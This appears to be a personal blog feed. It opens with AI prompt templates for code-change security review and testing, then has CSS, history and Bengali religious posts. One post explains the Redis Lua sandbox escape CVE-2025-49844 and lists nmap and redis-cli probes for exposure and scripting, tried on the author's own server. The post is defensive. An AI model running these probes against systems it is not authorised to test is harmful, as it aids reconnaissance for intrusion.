- Categorize changes by type (feature additions, bug fixes, refactoring, dependency updates, etc.)
- Analyze the scope and impact of each change

Phase 3 - Security Review:
Conduct a comprehensive security analysis covering ALL of the following domains:

- **Authentication & Authorization**: Session management, token handling, permission checks, privilege escalation risks
- **Input Validation**: SQL injection, XSS, command injection, path traversal, LDAP injection
- **Data Protection**: Sensitive data exposure, encryption at rest/transit, PII handling, data leakage
- **API Security**: Rate limiting, CORS, API authentication, input sanitization, response manipulation
- **Business Logic Flaws**: Workflow bypasses, race conditions, IDOR, state manipulation
- **Dependency Security**: Vulnerable libraries, supply chain risks, outdated packages
- **Configuration & Deployment**: Hardcoded secrets, insecure defaults, exposed debug endpoints
- **Error Handling**: Information disclosure through errors, stack traces, verbose logging
- **Session Management**: Token expiration, secure cookie flags, session fixation
- **Access Control**: Horizontal/vertical privilege escalation, missing function-level access control
- **Cryptography**: Weak algorithms, improper key management, predictable randomness
- **File Upload/Download**: Unrestricted file uploads, malicious file execution, directory traversal
- **Third-party Integrations**: OAuth misconfigurations, API key exposure, webhook security

Phase 4 - Deliverables:
Provide a structured report with:

1. **Executive Summary**: High-level overview of changes and security posture
2. **Detailed Findings**: For each security concern:
   - Severity (Critical/High/Medium/Low)
   - Affected files and code sections
   - Vulnerability description and potential impact
   - Attack scenarios
   - Remediation recommendations
3. **Test Cases for Validation**: For each finding, provide specific test cases:
   - Test objective
   - Steps to reproduce/validate
   - Expected secure behavior
   - How to verify the vulnerability is NOT present

4. **Positive Security Observations**: Note any security improvements made

FORMAT YOUR RESPONSE:
Use clear sections with markdown formatting. Be specific with file names, line numbers, and code references. Prioritize findings by risk.

REFERENCES TO COMPARE:
[I will provide the two branches/tags/releases here]

PROMPT 2: SQA Test Engineer

You are an experienced SQA (Software Quality Assurance) Engineer responsible for creating comprehensive test cases for a SaaS/web application based on code changes.

TASK OVERVIEW:
I will provide you with 2 branches/tags/releases to compare. Your job is to:
1. Analyze the project to understand the application and its functionality
2. Use GitHub CLI to identify changes between the provided references
3. Generate detailed test cases for new/modified features
4. Identify necessary regression and integration tests

STEP-BY-STEP PROCESS:

Phase 1 - Project Understanding:
- Examine the project structure and understand the application's purpose
- Identify the application architecture and key user flows
- Understand existing features and how components interact
- Review any existing test documentation or test files

Phase 2 - Change Analysis:
- Use `gh` CLI commands to retrieve the diff between the two provided references
- Identify all modified files and their dependencies
- Categorize changes into:
  - New features
  - Feature modifications/enhancements
  - Bug fixes
  - UI/UX changes
  - API/backend changes
  - Database schema changes
  - Configuration changes

Phase 3 - Test Case Generation:
Create comprehensive test cases for:

A. **Functional Testing** (for new/modified features):
   - Happy path scenarios
   - Boundary value testing
   - Negative testing
   - Edge cases

B. **Integration Testing**:
   - Component interaction tests
   - API integration tests
   - Third-party service integrations
   - Database interactions

C. **Regression Testing**:
   - Existing functionality that might be affected by changes
   - Critical user workflows that must remain functional
   - Previously fixed bugs that shouldn't resurface

D. **Cross-cutting Concerns**:
   - UI/UX consistency
   - Performance impact
   - Compatibility (browsers, devices if applicable)
   - Data integrity

Phase 4 - Deliverables:
For each test case, provide:

**Test Case Format:**
- **Test Case ID**: Unique identifier
- **Test Title**: Clear, descriptive title
- **Feature/Module**: What part of the application
- **Test Type**: Functional/Integration/Regression
- **Priority**: Critical/High/Medium/Low
- **Preconditions**: Any setup or state required
- **Test Steps**: Numbered, clear steps
- **Test Data**: Sample data to use (if applicable)
- **Expected Results**: What should happen at each step
- **Postconditions**: Expected state after test completion

**Additional Sections:**
1. **Test Coverage Summary**: Overview of what's being tested
2. **Testing Dependencies**: Any tools, environments, or access needed
3. **Risk Areas**: High-risk changes requiring extra attention
4. **Suggested Test Execution Order**: Logical sequence for running tests

FORMAT YOUR RESPONSE:
Organize test cases by feature/module. Group related tests together. Use clear numbering and markdown formatting for easy reference.

REFERENCES TO COMPARE:
[I will provide the two branches/tags/releases here]

PROMPT 3: Senior Automation Test Engineer

You are a Senior Automation Test Engineer specializing in end-to-end (E2E) testing for SaaS/web applications. Your expertise is in designing comprehensive test automation strategies.

TASK OVERVIEW:
I will provide you with 2 branches/tags/releases to compare. Your job is to:
1. Analyze the project and understand the application architecture
2. Use GitHub CLI to identify changes between the provided references
3. Design E2E test scenarios that properly cover the changes
4. Provide framework-agnostic test scenarios in natural language

STEP-BY-STEP PROCESS:

Phase 1 - Project Understanding:
- Examine the project structure and identify the application type
- Map out user journeys and critical workflows
- Identify UI components, API endpoints, and data flows
- Understand the application's integration points (databases, external services, etc.)

Phase 2 - Change Analysis:
- Use `gh` CLI commands to retrieve the diff between the two provided references
- Identify all modified files and their dependencies
- Map changes to user-facing features and workflows
- Identify impacted user journeys and integration points

Phase 3 - E2E Test Design:
Design comprehensive E2E test scenarios covering:

A. **User Journey Tests**:
   - Complete workflows from start to finish
   - Multi-step processes involving the changed functionality
   - User interactions across multiple pages/components

B. **Integration Flow Tests**:
   - Frontend-to-backend interactions
   - Data persistence and retrieval
   - Third-party service integrations
   - Cross-component communication

C. **State Management Tests**:
   - Application state changes
   - Session persistence
   - Data synchronization

D. **Critical Path Coverage**:
   - Core business functionality involving changes
   - Revenue-impacting features
   - Security-critical flows (authentication, authorization, payment)

E. **Cross-Browser/Cross-Device Scenarios** (if applicable):
   - Responsive behavior
   - Browser-specific functionality

Phase 4 - Deliverables:
For each E2E test scenario, provide:

**Test Scenario Format:**
- **Scenario ID**: Unique identifier
- **Scenario Title**: Clear, user-story-like title
- **Objective**: What this test validates
- **Priority**: Critical/High/Medium/Low
- **User Role/Persona**: Who would perform this action
- **Preconditions**: Required setup, test data, system state
- **Test Scenario Steps**: Detailed, numbered steps in natural language including:
  - User actions (click, type, navigate, etc.)
  - System interactions (API calls, database updates, etc.)
  - Verification points (what to check at each step)
- **Expected Results**: End state and all verification points
- **Test Data Requirements**: Sample data needed for execution
- **Dependencies**: External services, databases, or configurations needed
- **Estimated Execution Time**: Approximate duration

**Additional Sections:**
1. **E2E Test Coverage Summary**: Overview of workflows covered
2. **Test Execution Strategy**: Suggested order and grouping of tests
3. **Data Management Strategy**: How to handle test data setup/cleanup
4. **Environment Requirements**: What environments these tests should run in
5. **Automation Considerations**: 
   - Key elements to interact with (described in natural language)
   - Timing/synchronization concerns
   - Potential flakiness risks
   - Suggestions for test stability

6. **Visual Validation Points**: Areas requiring screenshot/visual comparison

FORMAT YOUR RESPONSE:
Organize scenarios by user journey or feature area. Use clear markdown formatting. Write test steps as if instructing a human tester - this ensures the scenarios are truly framework-agnostic and can be implemented in any automation tool.

REFERENCES TO COMPARE:
[I will provide the two branches/tags/releases here]

Usage Instructions:

For each prompt, when you're ready to use it:

Copy the entire prompt
Paste it into your AI conversation
Replace the last line [I will provide the two branches/tags/releases here] with your actual references, for example:
- main...feature/new-dashboard
- v1.2.0...v1.3.0
- release/2024-01...release/2024-02

The AI will then execute all phases and provide you with comprehensive, actionable outputs tailored to each role's perspective.

CSS Combinators Explained: Types, Syntax & Use Cases

hello@hurayraiit.com (Abu Hurayra) — Mon, 10 Nov 2025 00:00:00 GMT

In CSS, combinators define how selectors relate to each other. They help you style elements based on their position or relationship within the HTML structure. There are four primary combinators: descendant (space), child (>), adjacent sibling (+), and general sibling (~).

The descendant combinator (a space between selectors) selects all elements nested inside a specified ancestor, at any level of depth.
For example:

<div>
  <p>This paragraph is blue.</p>
  <section>
    <p>This paragraph is also blue because it’s inside a div.</p>
  </section>
</div>
<p>This paragraph is not inside a div.</p>

div p {
  color: blue;
}

Here, both paragraphs inside the <div> are styled blue, no matter how deeply nested they are. The last <p> outside the <div> is not affected.

The child combinator (>) targets only direct children of an element, not deeper descendants.

<div>
  <p>This paragraph is red.</p>
  <section>
    <p>This paragraph is not red because it’s inside a section.</p>
  </section>
</div>

div > p {
  color: red;
}

Only the first <p> is selected because it’s a direct child of <div>.

The adjacent sibling combinator (+) selects the element that comes immediately after another element on the same hierarchy level.

<h2>Section Title</h2>
<p>This paragraph follows an h2 directly.</p>
<p>This paragraph is not adjacent to h2.</p>

h2 + p {
  font-weight: bold;
  color: green;
}

Here, only the first <p> right after the <h2> is bold and green. The second <p> remains unchanged.

The general sibling combinator (~) targets all elements that share the same parent and appear after a specified element, not just the immediate one.

<h2>Section Title</h2>
<p>First paragraph after h2.</p>
<p>Second paragraph after h2.</p>
<div>Some div after h2.</div>
<p>Third paragraph after h2.</p>

h2 ~ p {
  color: gray;
}

All <p> elements that come after the <h2>—no matter how many or how far apart—will turn gray.

CSS combinators let you express relationships between elements clearly and powerfully. Instead of cluttering your HTML with extra classes or IDs, you can use combinators to target specific structures and maintain clean, semantic code.

প্রাইস কত? ইনবক্স চেক করুন!

hello@hurayraiit.com (Abu Hurayra) — Thu, 23 Oct 2025 00:00:00 GMT

ফেসবুকে প্রায়ই দেখি 🧐 অনলাইন শপগুলোর অনেকেই প্রোডাক্টের বিজ্ঞাপন করার সময় দাম উল্লেখ করে না।
কমেন্ট করে দাম জানতে চাইলে বলে, “ইনবক্স চেক করুন” 📩

তারপর ইনবক্সে গেলে তারা দাম বলবে। আবার অনেক সময় ইনবক্সে দাম না বলে প্রোডাক্টের বা অনলাইন শপের লিঙ্ক ধরিয়ে দেয়।

এটা হয়তো তাদের মার্কেটিংয়ের কোনও ট্যাকটিক 🎯
কিন্তু গ্রাহক হিসাবে আমার জন্য বিষয়টা বেশ বিরক্তিকর 😤

তবে আজকে একটা নতুন টেকনিক শিখলাম 😎
কমেন্টে গিয়ে র‍্যান্ডম একটা নাম্বার বানিয়ে লিখলাম, “প্রাইস এত টাকা 💰”

এরপর তারা কনফিউশন এড়ানোর জন্য আসল প্রাইসটাই বলে দিল 😂

The Soviet Mapmaker’s Secret: Why Post-USSR Peace Failed

hello@hurayraiit.com (Abu Hurayra) — Wed, 15 Oct 2025 00:00:00 GMT

When the Soviet Union disintegrated in 1991, fifteen new nations emerged seemingly free. Yet their freedom was entangled in a web carefully woven decades earlier. Soviet mapmakers, especially under Joseph Stalin, had drawn borders not to unite ethnic groups but to mix them — ensuring no republic could achieve true cohesion without Moscow’s shadow.

[caption id="attachment_574" align="aligncenter" width="300"] Soviet Union - The Union of Soviet Socialist Republics.[/caption]

Throughout the 1920s and 1930s, as the USSR expanded its control, the Kremlin manipulated demographics with surgical precision. Populations were relocated, republics were redrawn, and autonomous regions were created where ethnic loyalties overlapped. This policy served a single goal: divide and rule. By embedding minorities from one republic into another, the Soviet leadership guaranteed future leverage — political, cultural, and military.

Kazakhstan was left with millions of ethnic Russians in the north. Moldova inherited the Russian-speaking enclave of Transnistria. Georgia contained Abkhazia and South Ossetia, both distinct in language and loyalty. Ukraine’s eastern territories were heavily Russified through industrial migration and forced resettlement. Each of these “accidents” would later erupt into conflict or serve as justification for Russian intervention.

Historians like Terry Martin and Serhii Plokhy note that the USSR’s nationality policy was both revolutionary and imperial: it celebrated diversity publicly while weaponizing it privately. The result was a geopolitical time bomb. When the Soviet empire fell, its fragments were never designed to live peacefully apart.

Three decades later, the echo of those borders still shapes Eurasia. The Soviet Union may be gone, but its map endures — drawn not in ink, but in fault lines.

রাশিয়ার ইতিহাস

hello@hurayraiit.com (Abu Hurayra) — Sat, 11 Oct 2025 00:00:00 GMT

রাশিয়া নামে যে একটি দেশ হতে পারে এই ভাবনার শুরু নবম শতাব্দীর দিকে। নিপার নদীর ধারে ছিলো কিয়েভ শহর। সেই সময় কিয়েভ শহরকে কেন্দ্র করে নিপার নদীর আশেপাশের কয়েকটি শহর মিলে একটি ছোটো ফেডারেশন বা যুক্তরাষ্ট্র গঠন করা হয়। এই কাজটি করেছিল কিছু পূর্ব স্লাভিক গোত্রের মানুষেরা। এই অঞ্চলটি এখন ইউক্রেন নামে পরিচিত। তাদের ফেডারেশনের নাম ছিলো "কিয়েবান রুশ"। তবে কিয়েবান রুশকে বর্তমান সময়ের মতো কোনো জাতিরাষ্ট্র বলা চলে না।

এরপর ত্রয়োদশ শতকে মঙ্গোলরা প্রবল প্রতাপে তাদের সাম্রাজ্য বিস্তার করতে থাকে। সাম্রাজ্য বিস্তারের জন্য মঙ্গোলরা অন্যান্য অঞ্চলের মতো রাশিয়ার ভূমিকেও রেহায় দেয়নি। এই অঞ্চলটি তখন দক্ষিণ এবং পূর্ব দিক থেকে প্রচুর মঙ্গোল আক্রোমণের শিকার হয়। এর জবাবে সদ্য জন্ম নেওয়া সেই রাশিয়া তখন একটু উত্তর-পূর্বে সরে এসে মস্কোকে কেন্দ্র করে তাদের অঞ্চলটিকে নতুনভাবে ঢেলে সাজায়। সেই সময়ের রাশিয়া "গ্র্যান্ড প্রিন্সিপালিটি অফ মস্কোভি" নামে পরিচিত ছিলো। তখন অবশ্য রাশিয়াকে আক্রমণ করা সহজ ছিলো! কারণ, দেশটির কোনো প্রাকৃতিক প্রতিরক্ষা ব্যবস্থা ছিল না। ছিল না কোনো মরুভূমি বা বড় কোনো পর্বত। ছিল শুধু অল্প কয়েকটা নদী। আর 'স্তেপ' নামক বিশাল তৃণভূমির দক্ষিণ এবং পূর্বদিকে ওত পেতে ছিল মঙ্গোলরা। এই মঙ্গোলরা ছিল দুর্ধর্ষ যোদ্ধা। তারা চাইলে যে কোনো দিক থেকেই আক্রমণ করতে পারত।

রাশিয়ার সম্রাটদের বলা হয় "জার"। রাশিয়ার প্রথম জার আইভান দ্যা টেরিবল "আক্রমণই শেষ্ঠ প্রতিরক্ষা" - এই নীতি প্রবর্তন করেন। প্রথমে তিনি দেশের মানুষকে একত্রিত করার উদ্যোগ নেন। জনগণের মধ্যে ঐক্য প্রতিষ্ঠা হওয়ার পর আগের চেয়ে অনেক শক্তিশালী হয়ে ওঠে রাশিয়া। শক্তি সঞ্চয়ের পরে তিনি সাম্রাজ্য বিস্তারের দিকে মনোযোগ দেন। বিশাল রাশিয়া এভাবেই বিশালতর হওয়ার পথে যাত্রা শুরু করে। একা একজন মানুষ কিভাবে ইতিহাস বদলে দিতে পারে তার উৎকৃষ্ট উদাহরণ হলেন জার আইভান দ্যা টেরিবল।

তার দূরদৃষ্টি আর নির্মমতা ছাড়া রাশিয়ার ইতিহাস সম্পূর্ণ অন্যরকম হতো। রাশিয়ার সম্প্রসারণ নীতি অবশ্য শুরু হয়েছিলো তার দাদু আইভান দ্যা গ্রেটের আমল থেকেই। তবে বুড়ো আইভানের রাজ্য বিস্তারের ঝোঁক ততটা তীব্র ছিল না।১৫৩৩ সালে তার নাতি আইভান দ্যা টেরিবল ক্ষমতায় আসার পর দৃশ্যপট সম্পূর্ণ বদলে যায়। তিনি অধিগ্রহণ করে নেন উরাল পর্বতমালার পূর্বাঞ্চল, ক্যাস্পিয়ান সাগরের দক্ষিণাঞ্চল এবং সুমেরুবৃত্তের উত্তর অংশ। রাশিয়া একে একে কাস্পিয়ান সাগর এবং কৃষ্ণসাগরের কর্তৃত্ব নিয়ে নেয়। এরপর তারা ককেশাস পর্বতমালাকে মঙ্গোলদের বিরুদ্ধে প্রাকৃতিক ঢাল হিসেবে ব্যবহার শুরু করে। চেচনিয়াতেও তারা সেনা ঘাঁটি স্থাপন করে। এভাবে মঙ্গোলদের পাশাপাশি পার্সিয়ান এবং অটোমান সাস্রাজ্যকেও আটকানো সম্ভব হয়।

এর মাঝে কিছু বাধাবিপত্তি এলেও, রাশিয়া পরের ১০০ বছরে উরাল পর্বত অতিক্রম করে এগিয়ে যায় সাইবেরিয়ার দিকে। ধীরে ধীরে বহুদূর পূর্বের প্রশান্ত মহাসাগরের উপকূল পর্যন্ত দখলে নিয়ে নেয়।

[রেফারেন্সঃ প্রিজনার্স অব জিওগ্রাফি]

লোকমান হাকিমের পরিচয়

hello@hurayraiit.com (Abu Hurayra) — Fri, 10 Oct 2025 00:00:00 GMT

লোকমান একজন মহান ব্যক্তি, আল্লাহ যাকে 'হিকমাহ' দান করেছেন। কোরআনে বর্ণিত হয়েছে :

"আর আমি দান করেছি লোকমানকে হিকমাহ।" (সুরা লোকমান, ৩১ : ১২)

খালিদ আর রবিয়ি বলেন, লোকমান ছিলেন একজন হাবশি দাস। তাঁর মনিব একদিন তাঁকে বললো, 'আমাদের জন্য এই বকরীটি জবাই করো।' তিনি বকরিটি জবাই করলেন। মনিব বললো, 'এর থেকে সবচেয়ে উত্তম দুটি অংশ বের করো।' তিনি জিহ্বা এবং কলিজা বের করলেন। এরও কিছুদিন পর মনিব তাঁকে আবার বলল, 'আমাদের জন্য এই বকরীটি জবাই করো।' তিনি জবাই করলেন। মনিব বলল, 'এর থেকে সবচেয়ে নিকৃষ্ট দুটি অংশ বের করো।' তিনি আবার জিহ্বা এবং কলিজা বের করলেন। মনিব বলল, 'তোমাকে উত্তম দুটি অংশ বের করতে বলেছিলাম, তুমি এ দুটিই বের করেছিলে। আর যখন নিকৃষ্ট দুটি অংশ বের করতে বললাম, তখনো এ দুটিই বের করলে!' লোকমান হাকিম বললেন, 'এ দুটি অঙ্গ ভালো (কাজে ব্যবহার) হলে এ দুটিই হয়ে ওঠে সর্বোত্তম অঙ্গ। আর যখন সেগুলো মন্দ (কাজে ব্যবহার) হয় তখন হয়ে ওঠে সবচেয়ে নিকৃষ্ট।' (ইবনু কাসির)

ইমাম কুরতুবি রহিমাহুল্লাহ বলেন, বলা হয় লোকমান ছিলেন আইয়ুব عليه السلام এর খালাতো ভাই অথবা ভাগিনা। একবার কোনো ব্যক্তিকে তাঁর দিকে তাকিয়ে থাকতে দেখে বললেন, 'তুমি যদি আমার মোটা ঠোট দুটি দেখে থাকো তাহলে জেনে রাখো, সেখান থেকে খুবই নরম ও সুক্ষ্ম কথা বের হয়। আর আমাকে যদিও কালো দেখছো কিন্তু আমার হৃদয়টা সাদা।'

CVE-2025-49844: RediShell Redis Lua Sandbox Escape Explained

hello@hurayraiit.com (Abu Hurayra) — Tue, 07 Oct 2025 00:00:00 GMT

Understanding the Issue: RediShell (CVE-2025-49844)

In October 2025, Wiz Research disclosed a critical remote code execution (RCE) vulnerability in Redis, which they named RediShell (CVE-2025-49844). The vulnerability stems from a use-after-free (UAF) memory corruption bug in the Lua scripting component of Redis, present for over a decade in the codebase.

Here’s how it works, at a high level:

Redis supports running Lua scripts via commands like EVAL and EVALSHA.
An attacker who already has some access (post-auth) can submit a specially crafted Lua script that manipulates the garbage collector or memory management internals. (The Hacker News)
Because of a UAF bug, the script can trick Redis into freeing memory and then reusing it in a way that escapes the sandbox, leading to arbitrary native code execution on the host. (wiz.io)
Once code execution is achieved, an attacker can fully compromise the host: exfiltrate data, wipe disks, install malware, pivot laterally to other systems, etc. (wiz.io)

Because Redis is heavily used in cloud and caching architectures, and because many deployments are misconfigured (e.g. exposed to the internet, lacking authentication), the impact is broad. Wiz estimates some 330,000 Redis instances are exposed publicly, with ~60,000 lacking authentication altogether. (wiz.io)

It’s also noteworthy that this is the first Redis vulnerability to receive a CVSS 10.0 (maximum severity) rating, underlining its severity. (wiz.io)

Which Versions Are Vulnerable?

According to the Hacker News summary of the Redis advisory, all versions of Redis with Lua scripting enabled are impacted. (The Hacker News)
However, patched versions have been released to address the vulnerability. The versions that fix the issue include:

6.2.20
7.2.11
7.4.6
8.0.4
8.2.2

Therefore, any Redis version older than these (in the respective major line) is considered vulnerable if Lua scripting is enabled. Also, even in newer versions, misconfiguration (e.g. allowing scripting or not applying the patch) may still leave you exposed.

How to Determine Your Redis Version & Assess Vulnerability

Here’s a practical checklist you can use to find out whether your Redis instance is vulnerable:

1. Connect to the Redis instance (locally or via CLI)

For example, using redis-cli:

redis-cli -h <host> -p <port> INFO server | grep redis_version

This outputs something like:

redis_version:7.0.15

Alternatively, you can run:

redis-cli -h <host> -p <port> INFO

and parse the redis_version field under the [Server] section.

2. Compare version to patched ones

If your reported version is less than the patched versions listed above in the same major branch (e.g. less than 7.2.11 if in the 7.x series), then your instance is likely vulnerable—assuming scripting is enabled.

If it’s equal or greater than the patched version (for that branch), you’re already on the safe side with regard to this specific bug (if patch is correctly applied).

3. Check whether Lua scripting is allowed / EVAL commands usable

Even a patched version might be misconfigured. You can test whether scripting commands are allowed:

redis-cli -h <host> -p <port> AUTH <password-if-enabled>
redis-cli -h <host> -p <port> EVAL "return 1" 0

If the EVAL command succeeds (returns 1), then scripting is enabled. If you get an error like NOPERM or “unknown command,” scripting is disabled or controlled by ACLs.

Alternatively, examine your redis.conf or ACL policies to see whether commands like EVAL, EVALSHA, SCRIPT, etc., are allowed for your user roles.

How to Check Whether Your Redis Is Internet-Accessible

Because the vulnerability requires network connectivity (i.e. attacker must reach the Redis service), one key risk is internet exposure. Below are ways you can assess whether your instance is accessible from the internet.

1. Port scanning (external)

From an external system (not within your internal network or cloud VPC), run a basic port check. For example:

nmap -p <redis_port> <public_ip>

If port 6379 (default) or your custom Redis port is open and responding, then your Redis is reachable.

2. Check cloud firewall / security group rules

If your Redis instance is deployed in a cloud environment (AWS, Azure, GCP, etc.), check the associated security group, network ACL, or firewall settings and inbound rules. If the Redis port (6379 or custom) is allowed from 0.0.0.0/0 (i.e. anywhere), it’s exposed. Ensure that inbound access is limited to known IPs or internal subnets.

3. Try connecting externally via `redis-cli` (from outside)

From a remote host:

redis-cli -h <public_ip> -p <port>

If you get a prompt or a connection (even an authentication prompt), the instance is reachable. If connection times out or is blocked, it’s likely firewalled.

Mitigations & Remediation Steps (brief)

(Though your request didn’t ask explicitly, it’s useful to include.)

Upgrade immediately to the patched versions listed above.
Disable or restrict Lua scripting: If you don’t need scripting, disable it or restrict via ACLs.
Require authentication: Use requirepass or ACL-based authentication so that anonymous access is prevented.
Disable unnecessary commands via ACLs (e.g. block EVAL, EVALSHA).
Run Redis under least privilege (non-root, minimal permissions).
Add network-level controls / firewall restrictions so only trusted addresses or internal networks can talk to Redis.

Let's test this with xCloud hosted servers

Step 01: Check Redis version

We can run the following command and find out the Redis version on our xCloud server:

redis-cli --version

❌ The Redis version running on our xCloud server is vulnerable.

Step 02: Check if Redis is exploitable or not

Let's first check if Redis allows connections from the internet or not on our xCloud servers using the following command:

grep "^bind" /etc/redis/redis.conf

❌ This means Redis listens on every available IPv4 address on our system — including public IPs

However, xCloud's built-in firewall feature does not allow connections to port 6379 by default. So xCloud servers & users are safe from this vulnerability. ✅

But for testing purposes, let's allow the port 6379 for a brief period to exploit it.

We intentionally opened the port to the internet to make the vulnerability exploitable. DO NOT DO THIS AT HOME.

Step 03: Let's try to exploit the vulnerability

We will try to connect to our Redis server from another machine. We will run the following command to try to exploit the vulnerability:

redis-cli -h 15x.xx.xx.x5  -p 6379  EVAL "return 1" 0

✅ This means xCloud server's Redis requires authentication. So even if port 6379 is open, the attacker must have access to a Redis account credentials to exploit this.

Let's go even further, and say that one of our sites got hacked and the attacker received the Redis credentials for that site.

Now using the provided Redis credentials we can use the following command to actually exploit the vulnerability:

redis-cli -u redis://username:Passwordu@1xx.xx.xx.x5:6379 EVAL "return 1" 0

Finally, we have been able to successfully exploit our xCloud server using the latest Redis vulnerability.

Summary (TL;DR)

❌ The Redis version running on xCloud servers is vulnerable to CVE-2025-49844

✅ But, xCloud users are safe and protected by xCloud's firewall and ACL.

শিশুর সংশোধন - প্রশংসা ও উপদেশ

hello@hurayraiit.com (Abu Hurayra) — Sun, 05 Oct 2025 00:00:00 GMT

আব্দুল্লাহ ইবনু উমর رضي الله عنه বলেন, আমি ছিলাম অবিবাহিত এক যুবক। রাসুলের যুগে আমি মসজিদে ঘুমাতাম। একদিন স্বপ্ন দেখি দুজন ফিরিশতা এসে আমাকে ধরে জাহান্নামের দিকে নিয়ে চললো। আমরা আরেক ফিরিশতার সাথে সাক্ষাৎ করলাম। সে আমাকে বললো, 'তোমাকে তো রক্ষা করা যাবে না।' ইবনু উমর رضي الله عنه বলেন, হাফসার কাছে আমি ঘটনাটি খুলে বললাম। সে রাসুলের কাছে উপস্থাপন করলো। রাসুল ﷺ বললেন, 'আব্দুল্লাহ তো উত্তম লোক। সে যদি রাতের কিছু অংশে সালাত পড়তো!' রাসুলের এ কথা শোনার পর ইবনু উমর رضي الله عنه রাতে খুব অল্প সময়ই ঘুমাতেন। (বুখারি, মুসলিম)

রাসুলের ﷺ মুখে একটুখানি প্রশংসা ইবনু উমরের মনে কতটা উদ্দীপনা তৈরি করেছে যে তিনি রাতের অধিকাংশ সময় সালাতেই কাটিয়ে দিতেন!

ইমাম গাযালি রহিমাহুল্লাহ বলেন, শিশুর মাঝে যখন সুন্দর আচরণের প্রকাশ ঘটবে, ভালো কোনো কাজ তার দ্বারা সংঘটিত হবে তখন তাকে স্নেহ করা উচিত। পুরস্কার দিয়ে উৎসাহিত করা উচিত। মানুষের সামনে তার প্রশংসা করলে ভালো কাজের প্রতি সে আরও উৎসাহিত হবে।

আর যখন শিশুর থেকে এর বিপরীত কোনো আচরণ বা কাজ অর্থাৎ মন্দ কিছু তার দ্বারা সংঘটিত হবে এবং সে তা লুকাতে চেষ্টা করবে, তখন প্রথমে অভিভাবক দেখেও না দেখার ভান করবে। কাজটি যদি পুনরায় তার দ্বারা সংঘটিত হয় তাহলে সবার সামনে তাকে পাকড়াও না করে আড়ালে নিয়ে উপদেশ দেবে, মৃদু তিরস্কার করবে। এতে তার লাজ বজায় থাকবে এবং সে নির্লজ্জ হয়ে পড়বে না। তার কৃত মন্দ বিষয়টির দিকগুলো তাকে বুঝিয়ে বলবে। সঠিক বিষয়টি খুলে বলবে। আর পরে যেন এই কাজ না করে সে ব্যাপারে সতর্ক করবে। বলবে, আবার যদি এ কাজ করো, তাহলে সবাইকে জানিয়ে দেবো। (ইহইয়া উলুমিদ্দিন: ৩/৬৩)

দুঃখ ও মুসিবতে ধৈর্যধারণ

hello@hurayraiit.com (Abu Hurayra) — Sat, 04 Oct 2025 00:00:00 GMT

ইবনু আবি হাতিমের রিওয়ায়েতে আছে, মুহাম্মাদ বিন ইসহাক বলেন, মালিক আল আশজায়ি রাসুলের ﷺ কাছে এসে বললেন, আমার ছেলে আউফ বন্দী হয়ে গেছে। রাসুল তাকে বললেন, 'তোমার ছেলের কাছে এ কথার সংবাদ পাঠাও, রাসুল ﷺ তোমাকে বেশি বেশি লা হাওলা ওয়া লা কুওয়াতা ইল্লা বিল্লাহ পড়তে বলেছেন।'

কাফিররা তাকে চামড়ার দড়ি দিয়ে বেধে রেখেছিলো। হঠাৎ সেটা খুলে পড়ে গেল। তিনি বেরিয়ে এলেন। একটি উটনী দেখে তাতে চড়ে বসলেন। কিছুটা এগিয়ে দেখতে পেলেন শত্রুদের চারণভূমিতে তাদের পশুগুলো চড়ে বেড়াচ্ছে। তিনি একটি আওয়াজ দিলেন। গোটা পশুপাল তার পিছে পিছে চলতে লাগলো।

বাড়িতে বসে তার মা-বাবা চিন্তা করছিলেন। তারা হঠাৎ দরজায় তাদের ছেলে আউফের কন্ঠ শুনতে পেলেন। তার বাবা বলে উঠলেন, কা'বার রবের শপথ, এটা তো আউফের গলা! তারা উভয়ে এবং তাদের খাদেম দৌড়ে গিয়ে দরজা খুললেন। দেখতে পেলেন আউফ رضي الله عنه দাঁড়িয়ে আছেন। গোটা উঠান উট দিয়ে ভরে গেছে। তিনি তার বাবাকে সব খুলে বললেন। তার বাবা বললেন, তোমরা একটু দাঁড়াও, আমি রাসুলের কাছে জিজ্ঞেস করে আসি। রাসুলের কাছে পৌঁছে তিনি আউফ এবং উটের পালের বিবরণটি শোনালেন। রাসুল ﷺ তাকে বললেন,

"এগুলো নিয়ে যা ইচ্ছে করতে পারো। তুমি তোমার সম্পদেই হস্তক্ষেপ করছো।"

অতঃপর এ আয়াতটি নাজিল হলোঃ

"এবং তিনি তাকে এমন উৎস থেকে রিজিক দেবেন যা সে কল্পনাও করতে পারবে না। আর যে আল্লাহর উপর তাওয়াক্কুল করে আল্লাহ তার জন্য যথেষ্ট।" (সুরা আত তালাক, ৬৫ঃ ২, ৩)

কমিউনিকেশন - নিজের পরিচয় ও কনটেক্সট দিয়ে আলাপ শুরু করা

আমাকে জিজ্ঞেস করা কমন কিছু প্রশ্নের উত্তর

hello@hurayraiit.com (Abu Hurayra) — Fri, 03 Oct 2025 00:00:00 GMT

আপনি যদি সোশাল মিডিয়া ব্যবহার করেন, তবে নিশ্চয়ই আপনি ম্যাসেজিং করে যোগাযোগ করার সাথে পরিচিত। হোক সেটা ফেইসবুক ম্যাসেঞ্জার বা হোয়াটসঅ্যাপে। আপনি হয়তো কাউকে প্রয়োজনে ম্যাসেজ পাঠান, আবার কেউ হয়তো আপনাকেও ম্যাসেজ পাঠিয়ে থাকেন।

ঠিক একইভাবে পরিচিত, অপরিচিত অনেক মানুষ প্রায়ই আমাকে সোশাল মিডিয়া বা হোয়াটসঅ্যাপে ম্যাসেজ দিয়ে থাকেন। কিন্তু মজার ব্যাপার হলো অধিকাংশ ম্যাসেজই খুব কমন। যেসব প্রশ্নের উত্তর সাধারণত একইরকম হয়ে থাকে।

তাই সবার সুবিধার্থে এই ব্লগ পোস্টে সেসব কমন কিছু পোস্টের উত্তর দেওয়া হলো।

ম্যাসেজঃ আসসালামু আলাইকুম / Assalamu Alaikum+

উত্তর: ওয়ালাইকুমুস সালাম ওয়া রহমাতুল্লাহি ওয়া বারাকাতুহু

وعليكم السلام ورحمة الله وبركاته

ম্যাসেজঃ কেমন আছেন / আছো / আছিস?+

উত্তরঃ আলহামদুলিল্লাহ। মহান আল্লাহর ﷻ ইচ্ছায় অনেক ভালো আছি। আপনি কেমন আছেন, আপনার পরিবার কেমন আছেন?

ম্যাসেজঃ কি খবর ব্রো / কি অবস্থা ব্রো?+

ম্যাসেজঃ ফ্রি আছেন / আছিস / আছো?+

